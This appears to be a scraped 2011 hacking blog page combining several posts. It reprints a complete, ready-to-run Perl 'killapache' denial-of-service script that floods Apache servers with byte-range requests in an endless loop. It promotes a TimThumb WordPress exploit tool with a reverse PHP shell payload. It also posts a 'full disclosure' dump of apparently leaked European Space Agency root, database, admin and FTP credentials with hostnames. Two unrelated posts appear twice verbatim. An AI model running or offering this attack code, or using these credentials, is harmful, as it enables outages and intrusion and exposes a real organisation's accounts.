Killapache: DDOS Tool For Apache Servers

The Apache Software Foundation has announced a denial-of-service vulnerability that affects all versions of the ubiquitous Apache web server, leaving up to 65% of all websites vulnerable. A unknown flaw in the code for processing byte range headers allows versions 2.2.x of the Apache Web Server to be crippled from a single PC. A suitable “Apache Killer” Perl script that impressively demonstrates the problem.


Advisory - Click here 


How does killapache DDOS tool work?
killapache sends GET requests with multiple “byte ranges” that will claim large portions of the system’s memory space. A “byte range” statement allows a browser to only load certain parts of a document, for example bytes 500 to 1000. It is normally used while downloading large files. This method is used by programs such as download clients to resume downloads that have been interrupted; it is designed to reduce bandwidth requirements. However, it appears that stating multiple unsorted components in the header can cause an Apache server to malfunction.

The code

1. #Apache httpd Remote Denial of Service (memory exhaustion)


2. #By Kingcope


3. #Year 2011


4. #


5. # Will result in swapping memory to filesystem on the remote side


6. # plus killing of processes when running out of swap space.


7. # Remote System becomes unstable.


8. #


9.  


10. use IO::Socket;


11. use Parallel::ForkManager;


12.  


13. sub usage {


14.         print "Apache Remote Denial of Service (memory exhaustion)\n";


15.         print "by Kingcope\n";


16.         print "usage: perl killapache.pl <host> [numforks]\n";


17.         print "example: perl killapache.pl www.example.com 50\n";


18. }


19.  


20. sub killapache {


21. print "ATTACKING $ARGV[0] [using $numforks forks]\n";


22.        


23. $pm = new Parallel::ForkManager($numforks);


24.  


25. $|=1;


26. srand(time());


27. $p = "";


28. for ($k=0;$k<1300;$k++) {


29.         $p .= ",5-$k";


30. }


31.  


32. for ($k=0;$k<$numforks;$k++) {


33. my $pid = $pm->start and next;  


34.        


35. $x = "";


36. my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],


37.                                  PeerPort => "80",


38.                                          Proto    => 'tcp');


39.  


40. $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";


41. print $sock $p;


42.  


43. while(<$sock>) {


44. }


45.  $pm->finish;


46. }


47. $pm->wait_all_children;


48. print ":pPpPpppPpPPppPpppPp\n";


49. }


50.  


51. sub testapache {


52. my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],


53.                                  PeerPort => "80",


54.                                          Proto    => 'tcp');


55.  


56. $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";


57. print $sock $p;


58.  


59. $x = <$sock>;


60. if ($x =~ /Partial/) {


61.         print "host seems vuln\n";


62.         return 1;      


63. } else {


64.         return 0;      


65. }


66. }


67.  


68. if ($#ARGV < 0) {


69.         usage;


70.         exit;  


71. }


72.  


73. if ($#ARGV > 1) {


74.         $numforks = $ARGV[1];


75. } else {$numforks = 50;}


76.  


77. $v = testapache();


78. if ($v == 0) {


79.         print "Host does not seem vulnerable\n";


80.         exit;  


81. }


82. while(1) {


83. killapache();


84. }

Tim Thumb Wordpress Exploit

Recently tim thumb wordpress 0 day exploit is released by MaxE it caches even remote files locally, without doing any proper sanitization. The file “timthumb.php” does however, check if to see if the target file is actually an image or not. This timthumb file is also quite often renamed to something else and is used in many themes.

TimThumbCraft – Image Crafting Tool

The easiest way to trick TimThumb into believing a remotely stored image (that also contains evil PHP code) is an actual image, is to either craft it yourself or by using an external tool. Here is small tool for the job which also has a few encoding features, payload types, and of course, options for custom images.

Feature List:

List known vulnerable themes
Choose between 2 images or select your own
Enter your own code or use the Reverse PHP Shell
Encode your PHP Payload, this applies only if “code” is chosen
Base64 and Hexadecimal encoding is currently supported
Hexadecimal output of the created file. (Can be used in paste’s, etc.)
MD5 calculation of filename, that the target server will most likely use

References:
Proof of Concept: http://www.exploit-db.com/exploits/17602/
TimThumbCraft: Download it here
Demo Video (LQ): http://www.youtube.com/watch?v=udyEOzHK08E
Demo Video (HQ): https://rapidshare.com/files/2016620847/timthumb.avi
Original Info: http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
Vulnerable Themes: http://blog.sucuri.net/2011/08/timthumb-security-vulnerability-list-of-themes-including-it.html

source: http://www.exploit-db.com/wordpress-timthumb-exploitation/

Mozilla Firefox4.0.1 First Security Update

Mozilla Released it's first release of Mozilla Firefox Firefox 4.0.1 which is a open source browser.

Fourteen flaws have been found in Firefox 4.0.1 from which 13 flaws are categorized as critical Vulnerabilities and one is mentioned low impact Vulnerability.

The biggest category of fixed vulnerabilities in Firefox 4.0.1 are memory safety related issues, with 10 identified flaws.

"Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products," Mozilla warned in its advisory. "Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code." 

You can check their warning here - Here

The high impact category of flaws is in WebGL and its related WebGLES graphics library. Mozilla is providing three fixes for WebGLES flaws in the Firefox 4.0.1 update.

 As opposed to the critical memory flaws that Mozilla is patching with the Firefox 4.0.1 release, the XSLT flaw will not lead to arbitrary code execution. According to Mozilla, the XSLT flaw could have been used by an attacker to help launch some form of memory corruption that could possibly make another attack more reliable.  

The Firefox 4.0.1 release is the first update to Mozilla's browser since Firefox 4 release in March. Firefox developers are currently on Firefox 5, which may release at JUNE last

Mozilla Firefox4.0.1 First Security Update

Mozilla Released it's first release of Mozilla Firefox Firefox 4.0.1 which is a open source browser.

Fourteen flaws have been found in Firefox 4.0.1 from which 13 flaws are categorized as critical Vulnerabilities and one is mentioned low impact Vulnerability.

The biggest category of fixed vulnerabilities in Firefox 4.0.1 are memory safety related issues, with 10 identified flaws.

"Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products," Mozilla warned in its advisory. "Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code." 

You can check their warning here - Here

The high impact category of flaws is in WebGL and its related WebGLES graphics library. Mozilla is providing three fixes for WebGLES flaws in the Firefox 4.0.1 update.

 As opposed to the critical memory flaws that Mozilla is patching with the Firefox 4.0.1 release, the XSLT flaw will not lead to arbitrary code execution. According to Mozilla, the XSLT flaw could have been used by an attacker to help launch some form of memory corruption that could possibly make another attack more reliable.  

The Firefox 4.0.1 release is the first update to Mozilla's browser since Firefox 4 release in March. Firefox developers are currently on Firefox 5, which may release at JUNE last

Detecting Google hacking against your Website

Google or other search engines have been used for many purposes such as finding useful information, important websites and latest news on different topics, Google index a huge number of web pages that are growing daily. From the security prospective these indexed pages may contain different sensitive information.

Google hack involves using advance operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific versions of vulnerable Web applications.
GHH is a “Google Hack” honeypot. GHH is designed to provide reconnaissance against attackers that use search engines as a hacking tool against your resources so it implements honeypot theory to provide additional security to your web presence.
To install the Google Honeypot on your website you follow the install instructions. This allows you to monitor attempts by malicious attackers to compromise your security. The logging functions that GHH implements allows you, the administrator, to do what you like with the information. You can use the attack database to gather statistics on would-be-attackers, report activities to appropriate authorities and temporarily or permanently deny access to resources.

Detecting Google hacking against your Website

Google or other search engines have been used for many purposes such as finding useful information, important websites and latest news on different topics, Google index a huge number of web pages that are growing daily. From the security prospective these indexed pages may contain different sensitive information.

Google hack involves using advance operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific versions of vulnerable Web applications.
GHH is a “Google Hack” honeypot. GHH is designed to provide reconnaissance against attackers that use search engines as a hacking tool against your resources so it implements honeypot theory to provide additional security to your web presence.
To install the Google Honeypot on your website you follow the install instructions. This allows you to monitor attempts by malicious attackers to compromise your security. The logging functions that GHH implements allows you, the administrator, to do what you like with the information. You can use the attack database to gather statistics on would-be-attackers, report activities to appropriate authorities and temporarily or permanently deny access to resources.

European Space Agency (ESA.INT) Hacked – Full Disclosure

( European Space Agency )

The European Space Agency (ESA), established in 1975, is an intergovernmental organisation dedicated to the exploration of space, currently with 18 member states. Headquartered in Paris, ESA has a staff of more than 2,000 with an annual budget of about €3.99 billion / $5.65 billion US dollars (2011).
ESA’s space flight program includes human spaceflight, mainly through the participation in the International Space Station program, the launch and operations of unmanned exploration missions to other planets and the Moon, Earth observation, science, telecommunication as well as maintaining a major spaceport, the Guiana Space Centre at Kourou, French Guiana, and designing launch vehicles. The main European launch vehicle Ariane 5 is operated through Arianespace with ESA sharing in the costs of launching and further developing this launch vehicle.
More here.

******************************************************************
(+) Authors : TinKode
(+) WebSite : TinKode27.BayWords.Com
(+) Date    : 17.04.2011
(+) Hour    : 17:17 PM
(+) Targets : www.esa.int (European Space Agency)
(+) Document: ESA.int Full Disclosure (Hacked)
(+) Method  : UnKn0Wn
******************************************************************

Text Files:

• Main informations about server.  Click here.
• Main accounts from ESA.INT (Root Accounts,  Emails, FTPs,  Admins,  Editors,  etc). Click here.

Emails:

Preview of Root accounts,  Emails,  FTPs,  etc:

[Root Account]
---------------------------------------------------------------------
Username = root
Password = *8009BCFDDF013C178B831737138F2A3D8E652B8E (SHA1)

[DB Accounts]
---------------------------------------------------------------------
Username = jbossuser
Password = 49c6641168b072d0

Username = psocrat
Password = 49c6641168b072d0 

Username = root
Password = 49c6641168b072d0 

Username = jbossuser
Password = 7fe05ad56133d52b 

Username = psocrat
Password = 7fe05ad56133d52b 

[Administrator Account]
---------------------------------------------------------------------
username = rnay06
password = eduxxxr3
admin    = y

[Editor account]
---------------------------------------------------------------------
Username = editor
Password = editor2005

[FTP Accounts]
---------------------------------------------------------------------
Password : service2004
Username : nrtservice
Webserver: localhost
Protocol : scp

Username : riverusr
Password : usrriver
WebServer: styx.esrin.esa.it
Protocol : ftp

Username : mapinject
Password : .mapinject
Webserver: ssems1.esrin.esa.int
Protocol : sftp

Password : fire
Username : wfaa
WebServer: twin.esrin.esa.int
Protocol : ftp

Password : MMvomir07.
Username : uvomir
Webserver: 193.204.231.156
More     : http://whois.domaintools.com/193.204.231.156
Protocol : sftp

Password : 12qwas
Username : kimv
Webserver: kes.esrin.esa.int
Protocol : ftp

Password : Bk7Wdkf6hY
Username : emathot
Webserver: testlab4.esrin.esa.int
Protocol : ftp

Password : MecoGPOD123
Username : MecoGPOD
Webserver: metheny.esrin.esa.int
Protocol : ftp

Password : brteon
Username : betlem
Webserver: uranus.esrin.esa.it
Protocol : ftp

Password : ch9l
Username : ftpriv
Webserver: uranus.esrin.esa.int
Protocol : ftp

Password : .mapinject
Username : mapinject
Webserver: ssems1.esrin.esa.int
Protocol : sftp

Password : esa2004
Username : Olivier
Webserver: dummy.server.esa.int
Protocol : ftp

Password : .passWIL
Username : wilkinsa
Webserver: esa-mm.esa.int
Protocol : ftp

The ESA Logs:

source:tinkode